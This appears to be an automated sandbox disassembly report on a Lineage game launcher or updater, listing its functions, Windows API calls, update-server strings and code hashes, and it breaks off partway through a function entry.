                                                                              • String ID: Can NOT find The Hacking tool detecting program!$ Can't connetc nProtect Server. Continue? $ Fail in Removing. Continue? $ Hacking tool detecting program invalid. Continue? $%s$&IP:$&PO:$/%s %d$/DLX$/EGPARAM:$/KWG$/dreamx %s %s %s %s %s %d$/excite %s$/gt0$/hitel$/hitel %s %d$/hongkong$/host:$/japan$/korean$/kornet %s %s %s %s %d$/lgi$/noupdate$/pcbang$/portno:$/s %d$/shinbiro$/shinbiro %s %d$/taiwan$/test$/tvnet$/u %d$/unitel$/us$/ver$203.240.193.27$210.122.63.89$210.208.82.10$Can't execute lin.bin$FindHack.exe$HKupdate.lineage.com.hk$Lineage$TWupdate.lineage.com.tw$This option is allowed only after successful auto-update. Otherwise, client can crash due to lack of some resource.$WARNING$Warning$You can't connect Japanese server not using Japanese OS$arguments$build number = %d$chollian$dreamx$excite$game.kornetworld.com$gamegw.dreamx.net$gt0$hanaro$hitel$jpnupdate.ncsoft.co.kr$kmainupd.ncsoft.co.kr$kornet$ktestupd.ncsoft.co.kr$list-c-c.txt$list-c-e.txt$list-c-k.txt$list-c.txt$list-e-e.txt$list-h-c.txt$list-h-e.txt$list-j-j.txt$list-k-e.txt$list-k-k.txt$list-k.txt$list-t-k.txt$mihosoft$moya$pcbang$shinbiro$tvnet$unitel$usmainupd1.lineageTheBloodpledge.com$usmainupd2.lineageTheBloodPledge.com$usmainupd2.lineageTheBloodPledge.com$version: %d$~!@#%^$<
                                                                              • API String ID: 3856140011-1949667635
                                                                              • Opcode ID: d3e96e0fc2febfee422ba0f090af65c4589cf60741703a6fefff8c70eb62552e
                                                                              • Instruction ID: 1b4da73cbde776bda2e2ca1fe44aef3ff0f9507ae5b5eb5e8a7ba1db820c9719
                                                                              • Opcode Fuzzy Hash: d3e96e0fc2febfee422ba0f090af65c4589cf60741703a6fefff8c70eb62552e
                                                                              • Instruction Fuzzy Hash: ACE24431B442005BD7248B34AC917AB3B91EB85714F68823AFD5AA33D0DBBD8D45C79E
                                                                              Function 0040A2B0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 174filetimeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 407 40a2b0-40a2cf 408 40a2d1-40a2e6 call 402470 407->408 409 40a2e8-40a311 407->409 411 40a318-40a334 FindFirstFileA 408->411 409->411 413 40a430-40a444 qsort 411->413 414 40a33a 411->414 415 40a4c5-40a4cf 413->415 416 40a446-40a448 413->416 417 40a33c-40a341 414->417 418 40a499-40a49b 416->418 419 40a44a-40a44c 416->419 420 40a347-40a34d 417->420 421 40a40a-40a418 FindNextFileA 417->421 423 40a4bb-40a4c2 free 418->423 427 40a49d-40a4a3 418->427 419->423 424 40a44e-40a45f 419->424 425 40a363-40a36c 420->425 426 40a34f-40a355 420->426 421->417 422 40a41e-40a429 FindClose 421->422 422->413 423->415 430 40a463-40a495 call 402470 SetFileAttributesA DeleteFileA 424->430 429 40a36d-40a3a9 FileTimeToSystemTime 425->429 426->425 431 40a357-40a361 426->431 428 40a4a6-40a4b9 SetFileAttributesA DeleteFileA 427->428 428->423 428->428 432 40a3d2-40a406 429->432 433 40a3ab-40a3ca realloc 429->433 436 40a497 430->436 431->429 432->421 433->432 436->423
                                                                              APIs
                                                                              • FindFirstFileA.KERNELBASE(?,?,usmainupd2.lineageTheBloodPledge.com,?,75C09CE0,?), ref: 0040A325
                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A36D
                                                                              • realloc.MSVCRT ref: 0040A3B3
                                                                              • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040A410
                                                                              • FindClose.KERNEL32(00000000), ref: 0040A41F
                                                                              • qsort.MSVCRT ref: 0040A439
                                                                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 0040A481
                                                                              • DeleteFileA.KERNEL32(?), ref: 0040A48B
                                                                              • SetFileAttributesA.KERNEL32(00000004,00000080), ref: 0040A4AC
                                                                              • DeleteFileA.KERNEL32(00000004), ref: 0040A4AF
                                                                              • free.MSVCRT ref: 0040A4BC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: File$Find$AttributesDeleteTime$CloseFirstNextSystemfreeqsortrealloc
                                                                              • String ID: *.inv$usmainupd2.lineageTheBloodPledge.com
                                                                              • API String ID: 2622774032-2206764970
                                                                              • Opcode ID: b78d0a169d7eafec927e235ca9a9ce9b1bdf3d8a850a9ad878ecac7cfaec6eee
                                                                              • Instruction ID: 8ab419ae5727e00dd76f338a30fd8a6bc54a0b4cfab288e086b4cc70d109a9d6
                                                                              • Opcode Fuzzy Hash: b78d0a169d7eafec927e235ca9a9ce9b1bdf3d8a850a9ad878ecac7cfaec6eee
                                                                              • Instruction Fuzzy Hash: C251F3325043098BC720DF24DC44AAB77E5EFC4304F058A3DF985A72C1DBB9A919879A
                                                                              Function 0040F5BF Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 437 40f5bf-40f634 __set_app_type __p__fmode __p__commode call 40f73f 440 40f642-40f699 call 40f72a _initterm __getmainargs _initterm 437->440 441 40f636-40f641 __setusermatherr 437->441 444 40f6d5-40f6d8 440->444 445 40f69b-40f6a3 440->445 441->440 448 40f6b2-40f6b6 444->448 449 40f6da-40f6de 444->449 446 40f6a5-40f6a7 445->446 447 40f6a9-40f6ac 445->447 446->445 446->447 447->448 450 40f6ae-40f6af 447->450 451 40f6b8-40f6ba 448->451 452 40f6bc-40f6cd GetStartupInfoA 448->452 449->444 450->448 451->450 451->452 453 40f6e0-40f6e2 452->453 454 40f6cf-40f6d3 452->454 455 40f6e3-40f710 GetModuleHandleA call 40a8f0 exit _XcptFilter 453->455 454->455
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                              • String ID:
                                                                              • API String ID: 801014965-0
                                                                              • Opcode ID: 5f72495c9dae707c1da66b513ded7e60af9e7f4282601f0d019affc9f2d51eb4
                                                                              • Instruction ID: cb1fc2d8bcd256223089e0405016f49992857ef66b05239ed091da7765e7311b
                                                                              • Opcode Fuzzy Hash: 5f72495c9dae707c1da66b513ded7e60af9e7f4282601f0d019affc9f2d51eb4
                                                                              • Instruction Fuzzy Hash: 17419D75940348AFCB30DFA4D885AAABBB8EB09710F20453FE441A76A1C7795886CB59
                                                                              Function 0040A770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26windownetworkCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 458 40a770-40a78b WSAStartup 459 40a7c4-40a7cc 458->459 460 40a78d-40a7c3 GetLastError sprintf MessageBoxA 458->460
                                                                              APIs
                                                                              • WSAStartup.WS2_32(00000202,?), ref: 0040A783
                                                                              • GetLastError.KERNEL32 ref: 0040A78D
                                                                              • sprintf.MSVCRT ref: 0040A79E
                                                                              • MessageBoxA.USER32(00000000,?,0041BA48,00000010), ref: 0040A7B5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastMessageStartupsprintf
                                                                              • String ID: WSAStartup failed: %ld
                                                                              • API String ID: 4232245815-1891744279
                                                                              • Opcode ID: f716aecf9be1a0daf5fee8d79ffac98e727cf8a3bca7afea556da6d1d4d7d82d
                                                                              • Instruction ID: f23a5ddfae2a665b835093c41cecaf45c4df1a98dacf58dd3f1acf0644010798
                                                                              • Opcode Fuzzy Hash: f716aecf9be1a0daf5fee8d79ffac98e727cf8a3bca7afea556da6d1d4d7d82d
                                                                              • Instruction Fuzzy Hash: 35E09B715803047BD7509760EC4EFEA3768BB54B01F848829B505C11D1E7FD419887AA
                                                                              Function 00402420 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 461 402420-402446 GetModuleFileNameA 462 402448-402449 461->462 463 40246a-40246f 461->463 464 40244f-402455 CharNextA 462->464 465 402457-40245a 464->465 466 40245c 464->466 465->466 467 40245e-402462 465->467 466->467 467->464 468 402464-402469 467->468
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(?,C:\Users\user\Desktop\,00000104,759B6A90,?,0040A990,?), ref: 00402431
                                                                              • CharNextA.USER32(C:\Users\user\Desktop\), ref: 00402450
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: CharFileModuleNameNext
                                                                              • String ID: C:\Users\user\Desktop\
                                                                              • API String ID: 3311180430-1996831427
                                                                              • Opcode ID: d1eee4875d7191ed5687d7a02dd0e5ed05f9fdb4d08bc019ec87a40e7b153047
                                                                              • Instruction ID: 74eb1d84806718cc772bceb7f0d1f511844d2cb957509e3ddb653c81c84e5933
                                                                              • Opcode Fuzzy Hash: d1eee4875d7191ed5687d7a02dd0e5ed05f9fdb4d08bc019ec87a40e7b153047
                                                                              • Instruction Fuzzy Hash: A0F0A0627822606EE7311678B9087D67FE44B663A2F1C0077E6C4A32D2C2BC488493AD
                                                                              Function 00402500 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 469 402500-402539 call 402470 _open
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: _open
                                                                              • String ID:
                                                                              • API String ID: 4183159743-0
                                                                              • Opcode ID: b38ecbca1aea726d295cc30956eb8dec0055a0c9bdaba2af4d99bbe62abef648
                                                                              • Instruction ID: df76e1a0bad9b822b6f36983da20bf7eb730ab311d27616ffaab059f5299df03
                                                                              • Opcode Fuzzy Hash: b38ecbca1aea726d295cc30956eb8dec0055a0c9bdaba2af4d99bbe62abef648
                                                                              • Instruction Fuzzy Hash: EBD012B44042406FD328DB14D946DFB73A8AB84304F44891CB59882150DA79D958C6A6

                                                                              Non-executed Functions

                                                                              Function 004084A0 Relevance: 73.9, APIs: 24, Strings: 18, Instructions: 413networkCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 525 4084a0-4084b0 WSAGetLastError 526 4084b6-4084b8 525->526 527 408539-408541 525->527 526->527 530 4084ba-4084c2 526->530 528 408547-408589 call 408a10 * 3 527->528 529 40862a-408651 closesocket socket 527->529 567 4085a3-4085dd call 408a10 * 2 528->567 568 40858b-40859e call 408a10 528->568 532 408653-408660 call 406a40 529->532 533 408665-408696 call 408200 bind 529->533 534 408500-408538 call 406a40 EndDialog closesocket 530->534 535 4084c4-4084fd call 408a10 * 3 530->535 550 4089e8-408a00 EndDialog 532->550 547 408698-4086cc call 406a40 EndDialog closesocket 533->547 548 4086cd-4086d9 533->548 535->534 553 4086f4-4086ff gethostbyname 548->553 554 4086db-4086dd 548->554 559 408701-408708 553->559 560 408746-408753 553->560 554->553 558 4086df-4086f2 inet_addr 554->558 563 408764-40878d htons connect 558->563 564 408715-408744 rand 559->564 565 40870a-408713 559->565 560->563 566 408755-408760 inet_addr 560->566 571 408793-4087a3 WSAGetLastError 563->571 572 4088e4-408934 call 406930 call 406b60 htonl call 407180 563->572 564->563 565->564 565->565 566->563 587 408624-408628 567->587 588 4085df-408622 inet_ntoa call 408a10 567->588 568->529 573 4087a9-4087ea call 408a10 * 3 571->573 574 4088ac-4088e3 call 406a40 EndDialog closesocket 571->574 596 408943-40894a 572->596 597 408936-408940 call 4070b0 572->597 602 408808-40880e 573->602 603 4087ec-4087ee 573->603 587->529 588->587 600 40894c-408952 596->600 601 4089ae-4089cd closesocket 596->601 597->596 600->601 607 408954-40899f call 406930 call 406b60 htonl call 407180 600->607 604 4089e3 call 4080d0 601->604 605 4089cf-4089e0 _close call 406e30 601->605 609 408810-408824 call 408a10 602->609 610 408829-408863 call 408a10 * 2 602->610 603->602 608 4087f0-408803 call 408a10 603->608 604->550 605->604 607->601 632 4089a1-4089ab call 4070b0 607->632 608->574 609->574 626 408865-4088a8 inet_ntoa call 408a10 610->626 627 4088aa 610->627 626->627 627->574 632->601
                                                                              APIs
                                                                              • WSAGetLastError.WS2_32 ref: 004084A0
                                                                              • EndDialog.USER32(?,000000FF), ref: 00408516
                                                                              • inet_addr.WS2_32 ref: 004086E0
                                                                              • gethostbyname.WS2_32 ref: 004086F5
                                                                              • rand.MSVCRT ref: 00408719
                                                                              • inet_addr.WS2_32(63.104.49.23), ref: 0040875A
                                                                              • htons.WS2_32(B91C07D3), ref: 0040876B
                                                                              • connect.WS2_32(?,00000002,00000010), ref: 00408784
                                                                              • WSAGetLastError.WS2_32 ref: 00408793
                                                                              • closesocket.WS2_32(?), ref: 00408523
                                                                                • Part of subcall function 00408A10: wvsprintfA.USER32(?,?,?), ref: 00408A28
                                                                                • Part of subcall function 00408A10: lstrlen.KERNEL32(?,00000000,00000000), ref: 00408A3A
                                                                                • Part of subcall function 00408A10: WriteFile.KERNEL32(?,?,00000000), ref: 00408A4E
                                                                              • inet_ntoa.WS2_32(?), ref: 00408600
                                                                              • closesocket.WS2_32(?), ref: 00408636
                                                                              • socket.WS2_32(00000002,00000001), ref: 00408643
                                                                              • bind.WS2_32(?,?,00000010), ref: 0040868D
                                                                              • EndDialog.USER32(?,000000FF), ref: 004086AE
                                                                              • closesocket.WS2_32(?), ref: 004086BB
                                                                              • inet_ntoa.WS2_32(?), ref: 00408886
                                                                              • EndDialog.USER32(?,000000FF), ref: 004088C2
                                                                              • closesocket.WS2_32(?), ref: 004088CE
                                                                              • htonl.WSOCK32(00000000), ref: 0040891D
                                                                              • htonl.WSOCK32(00000000), ref: 00408988
                                                                              • closesocket.WS2_32(?), ref: 004089BA
                                                                              • _close.MSVCRT ref: 004089D0
                                                                              • EndDialog.USER32(?,000000FF), ref: 004089F1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: closesocket$Dialog$ErrorLasthtonlinet_addrinet_ntoa$FileWrite_closebindconnectgethostbynamehtonslstrlenrandsocketwvsprintf
                                                                              • String ID: 63.104.49.23$Can't Connect$Can't bind socket$can't connect dns 2 host $can't connect dns host$can't connect host 2 $can't get host by dns 2 $can't get host by host1 dns$dns 2 total : %d dns 2 number : %d $dns total : %d dns number : %d $error code : %d$host1 : %s host2 : %s$host1 : %s host2 : %s $invalid socket$ip : %s $updating by dns $updating by entry 2 $updating by ip
                                                                              • API String ID: 1721191639-658854503
                                                                              • Opcode ID: 93d140a4cdbebd31d5611b6d480723f00d94bc541645e713151c54f087676a22
                                                                              • Instruction ID: 39551a8eeed1401d7f628dc5bcbaa7f4d77872479ec66451824b1c2f1ea740fc
                                                                              • Opcode Fuzzy Hash: 93d140a4cdbebd31d5611b6d480723f00d94bc541645e713151c54f087676a22
                                                                              • Instruction Fuzzy Hash: 7AE12874A003009BC710AF64ED8595B37A4FB88718B50857EF885B73D1DB7D9846CBAD
                                                                              Function 004093C0 Relevance: 67.1, APIs: 30, Strings: 8, Instructions: 554nativeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 635 4093c0-4094a7 636 4098dc-4098e2 635->636 637 4094ad 635->637 639 4098e8-40990b 636->639 640 409a88-409ab1 NtdllDefWindowProc_A 636->640 638 4094b3-4094b6 637->638 637->639 641 4094bc-4094c2 638->641 642 40960f-409628 73A1A570 SetBkMode 638->642 639->640 643 409911-409913 639->643 641->640 644 4094c8-4094e3 641->644 645 40962e-409635 642->645 646 4096df-4096e6 642->646 647 409915-409918 643->647 648 409969-40996f 643->648 644->640 653 4094e9-4094eb 644->653 645->646 649 40963b-4096d8 GetObjectA SelectObject GetPixel call 408ff0 * 2 DeleteDC 645->649 654 4096ec-4096f3 646->654 655 4097fd-409804 646->655 647->648 650 40991a-40991c 647->650 651 409971-409977 648->651 652 4099da-4099ed 648->652 649->646 650->648 656 40991e-409920 650->656 651->652 657 409979-40997b 651->657 652->640 661 4099f3-4099ff 652->661 658 409555-40955b 653->658 659 4094ed-4094f0 653->659 654->655 660 4096f9-409734 GetObjectA SelectObject GetPixel 654->660 662 40980a-409811 655->662 663 4098cf-4098d7 655->663 656->648 665 409922-409928 656->665 657->652 668 40997d-40997f 657->668 666 40955d-409563 658->666 667 4095ce-4095db 658->667 659->658 669 4094f2-4094f4 659->669 688 409736-409758 call 408ff0 660->688 689 40975b-409762 660->689 670 409a03-409a0c 661->670 662->663 671 409817-40987b GetObjectA SelectObject GetPixel call 408ff0 662->671 663->640 665->640 673 40992e-409964 ScrollWindow InvalidateRect * 2 665->673 666->667 674 409565-409567 666->674 677 4095ed-4095f4 667->677 678 4095dd-4095eb InvalidateRect 667->678 668->652 675 409981-409999 668->675 669->658 676 4094f6-4094f8 669->676 681 409a64-409a7f 670->681 682 409a0e-409a11 670->682 716 409893-40989a 671->716 717 40987d-409891 671->717 673->640 674->667 685 409569-40956b 674->685 675->640 686 40999f-4099d5 ScrollWindow InvalidateRect * 2 675->686 676->658 687 4094fa-409501 676->687 677->640 690 4095fa-40960a InvalidateRect 677->690 678->677 681->670 683 409a81 681->683 682->681 691 409a13-409a1c 682->691 683->640 685->667 697 40956d-40958a 685->697 686->640 698 409503-40950a 687->698 699 409529 687->699 688->689 693 409764-409786 call 408ff0 689->693 694 409789-40979e 689->694 690->640 691->681 701 409a1e-409a21 691->701 693->694 705 4097a0 694->705 706 4097ed-4097f6 DeleteDC 694->706 708 40958c-40958e 697->708 709 4095ad-4095af 697->709 698->640 710 409510-409524 InvalidateRect 698->710 699->640 712 40952f-409536 699->712 701->681 702 409a23-409a25 701->702 702->681 714 409a27-409a5e ScrollWindow InvalidateRect * 2 702->714 718 4097a4-4097aa 705->718 706->655 708->640 719 409594-4095a8 InvalidateRect 708->719 709->640 720 4095b5-4095c9 InvalidateRect 709->720 710->640 712->640 713 40953c-409550 InvalidateRect 712->713 713->640 714->681 722 4098c1-4098c8 DeleteDC 716->722 723 40989c-4098ac 716->723 721 4098b0-4098be call 408ff0 717->721 724 4097d0-4097eb 718->724 725 4097ac-4097cd call 408ff0 718->725 719->640 720->640 721->722 722->663 723->721 724->706 724->718 725->724
                                                                              APIs
                                                                              • InvalidateRect.USER32(?,?,00000000), ref: 0040951E
                                                                              • InvalidateRect.USER32(?,?,00000000), ref: 0040954A
                                                                              • InvalidateRect.USER32(?,0000014A,00000000), ref: 004095A2
                                                                              • InvalidateRect.USER32(?,0000014A,00000000), ref: 004095C3
                                                                              • InvalidateRect.USER32(?,?,00000000), ref: 004095EB
                                                                              • InvalidateRect.USER32(?,0000014A,00000000), ref: 00409608
                                                                              • 73A1A570.USER32(?), ref: 00409610
                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 0040961B
                                                                              • GetObjectA.GDI32(00000000,00000018,0042C008), ref: 00409643
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0040965A
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00409663
                                                                              • DeleteDC.GDI32(00000000), ref: 004096D2
                                                                              • GetObjectA.GDI32(00000000,00000018,0042C020), ref: 00409701
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00409718
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00409721
                                                                              • DeleteDC.GDI32(00000000), ref: 004097EE
                                                                              • GetObjectA.GDI32(00000000,00000018,0042C038), ref: 0040981F
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00409836
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0040983F
                                                                              • ScrollWindow.USER32(?,00000000,000000FA,00000000,00000000), ref: 0040993C
                                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 00409951
                                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 0040995C
                                                                              • ScrollWindow.USER32(?,00000000,FFFFFF06,00000000,00000000), ref: 004099AE
                                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 004099C3
                                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 004099CD
                                                                              • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00409AA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: InvalidateRect$Object$PixelSelectWindow$DeleteScroll$A570ModeNtdllProc_
                                                                              • String ID: ,$gfff$gfff$gfff$gfff$gfff$gfff$gfff
                                                                              • API String ID: 565317530-33231140
                                                                              • Opcode ID: e7b3f9ec5085d8a3cc5e500f01163fb4c1f685ac14b736a6681669a1c8a4172a
                                                                              • Instruction ID: ad69d5fd95c6e12ca3620a646f037bdf545fe48cff6134b29766add31207a344
                                                                              • Opcode Fuzzy Hash: e7b3f9ec5085d8a3cc5e500f01163fb4c1f685ac14b736a6681669a1c8a4172a
                                                                              • Instruction Fuzzy Hash: EF12C0B5604248AFD314CF29EC84A7B77E9EBC9304F44853EF54593392DB78AC418B6A
                                                                              Function 00408290 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 258networkCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1019 408290-4082be time srand 1020 4082c0-4082d7 EndDialog 1019->1020 1021 4082d8-408305 call 406930 socket 1019->1021 1024 408307-40832b call 406a40 EndDialog 1021->1024 1025 40832c-40835c call 408200 bind 1021->1025 1030 408396-4083a3 1025->1030 1031 40835e-408395 call 406a40 EndDialog closesocket 1025->1031 1033 4083c1-4083ce gethostbyname 1030->1033 1034 4083a5-4083a7 1030->1034 1037 4083d0-4083d7 1033->1037 1038 408405-408413 1033->1038 1034->1033 1036 4083a9-4083bc inet_addr 1034->1036 1039 408471-408934 htons connect call 406930 call 406b60 htonl call 407180 1036->1039 1040 4083e4-408403 rand 1037->1040 1041 4083d9-4083e2 1037->1041 1042 408415-408417 1038->1042 1043 408426-40842d gethostbyname 1038->1043 1057 408943-40894a 1039->1057 1058 408936-408940 call 4070b0 1039->1058 1048 40845d-40846d 1040->1048 1041->1040 1041->1041 1042->1043 1044 408419-408424 inet_addr 1042->1044 1045 40846f 1043->1045 1046 40842f-408437 1043->1046 1044->1039 1045->1039 1049 408444-40845a rand 1046->1049 1050 408439-408442 1046->1050 1048->1045 1049->1048 1050->1049 1050->1050 1060 40894c-408952 1057->1060 1061 4089ae-4089cd closesocket 1057->1061 1058->1057 1060->1061 1065 408954-40899f call 406930 call 406b60 htonl call 407180 1060->1065 1062 4089e3-408a00 call 4080d0 EndDialog 1061->1062 1063 4089cf-4089e0 _close call 406e30 1061->1063 1063->1062 1065->1061 1076 4089a1-4089ab call 4070b0 1065->1076 1076->1061
                                                                              APIs
                                                                              • time.MSVCRT(00000000), ref: 0040829A
                                                                              • srand.MSVCRT ref: 004082A1
                                                                              • EndDialog.USER32(?,000000FF), ref: 004082C8
                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 004082F7
                                                                              • EndDialog.USER32(?,000000FF), ref: 0040831C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Dialog$socketsrandtime
                                                                              • String ID: Can't bind socket$invalid socket
                                                                              • API String ID: 1151004215-413266663
                                                                              • Opcode ID: 61edf4585e5c344069ce076e42dbdf9f3d4770a32d7988672e834ad31e70eebe
                                                                              • Instruction ID: d33af3c2163843de5f8ecff5c0b2c46479a01783d05cd1e5bffdf96d018db75f
                                                                              • Opcode Fuzzy Hash: 61edf4585e5c344069ce076e42dbdf9f3d4770a32d7988672e834ad31e70eebe
                                                                              • Instruction Fuzzy Hash: 529149745003009BC710AF68ED44A9B77A0FF89318F44463EF855A73E1DB79A946CBAE
                                                                              Function 00409080 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 249nativeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
